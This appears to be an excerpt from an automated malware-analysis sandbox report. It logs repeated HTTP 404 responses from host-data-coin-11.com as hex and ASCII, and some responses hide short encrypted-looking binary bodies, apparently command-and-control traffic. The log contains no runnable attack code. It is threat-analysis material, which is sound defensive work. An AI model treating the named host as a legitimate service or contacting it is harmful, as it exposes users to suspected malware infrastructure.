3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Sun, 09 Jan 2022 17:47:40 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Sun, 09 Jan 2022 17:47:42 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 64 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f 90 df 13 49 3a 4a a6 e8 dd e6 f8 5f f5 4a 88 2d a0 57 53 98 00 e5 a7 2c f8 2f 0d 0a 30 0d 0a 0d 0a Data Ascii: 2dI:82OI:J_J-WS,/0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Sun, 09 Jan 2022 17:47:44 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Sun, 09 Jan 2022 17:47:44 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c5 86 52 06 26 1a ff b5 98 ff a9 1e ad 12 93 3a f9 55 50 99 4a f7 e0 25 e5 39 1a 4c ed a1 88 70 bc 57 dd 43 d4 fa 20 87 20 e7 c3 9a 57 2a e1 a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a Data Ascii: 46I:82OR&:UPJ%9LpWC W*c0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Sun, 09 Jan 2022 17:47:49 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Sun, 09 Jan 2022 17:47:52 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 33 37 0d 0a 02 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e d6 1e 52 25 40 a3 f5 c2 ea fb 5f f5 4d 8b 2d e4 04 08 c7 5c a5 ba 7a ae 2e 54 0a e3 f0 d8 4b fc 05 d4 43 0d 0a 30 0d 0a 0d 0a Data Ascii: 37I:82OR%@_M-\z.TKC0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Sun, 09 Jan 2022 17:47:54 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 65 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f d4 89 4f 04 7e 02 fc a9 8d b6 e4 05 ab 0c 91 6b b9 45 4b 95 09 fd bc 67 e5 32 50 0d 0a 30 0d 0a 0d 0a Data Ascii: 2eI:82OO~kEKg2P0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Sun, 09 Jan 2022 17:46:40 GMTContent-Type: text/htmlContent-Length: 178Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Sun, 09 Jan 2022 17:47:56 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Sun, 09 Jan 2022 17:47:57 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 33 30 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c5 86 52 06 26 1a ff b5 98 ff a9 1e ad 12 93 3a f9 55 50 99 4a f6 e8 24 e5 64 50 06 b9 0d 0a 30 0d 0a 0d 0a Data Ascii: 30I:82OR&:UPJ$dP0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Sun, 09 Jan 2022 17:48:02 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Sun, 09 Jan 2022 17:48:02 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Sun, 09 Jan 2022 17:48:04 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 62 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f 90 df 13 49 3c 5c a2 f7 d8 fc fb 46 f5 46 86 32 ef 06 10 c2 4b e1 e1 39 0d 0a 30 0d 0a 0d 0a Data Ascii: 2bI:82OI<\FF2K90
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Sun, 09 Jan 2022 17:48:09 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Sun, 09 Jan 2022 17:48:12 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 36 34 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 84 42 09 25 16 f9 b5 8f bd b8 15 a5 0c ce 2c b4 59 52 db 04 e5 fd 28 e3 22 58 1b b2 ed cf 00 b4 53 d1 42 d4 ff 26 85 21 ec ac 96 51 28 e2 b1 49 2d e3 b3 b7 60 fb 9a b5 5d ae 7c 96 ca 31 4a 59 3a 0e 43 dd bb 41 a7 f7 5e 9e ba dd 42 c6 36 9d 0d 0a 30 0d 0a 0d 0a Data Ascii: 64I:82OB%,YR("XSB&!Q(I-`]\|1JY:CA^B60
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Sun, 09 Jan 2022 17:48:15 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Sun, 09 Jan 2022 17:48:16 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Sun, 09 Jan 2022 17:48:16 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 63 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f 90 df 1e 49 3a 44 a6 e8 de ea e4 40 fd 45 91 6e b8 57 5b 91 17 bf ec 31 e5 0d 0a 30 0d 0a 0d 0a Data Ascii: 2cI:82OI:D@EnW[10
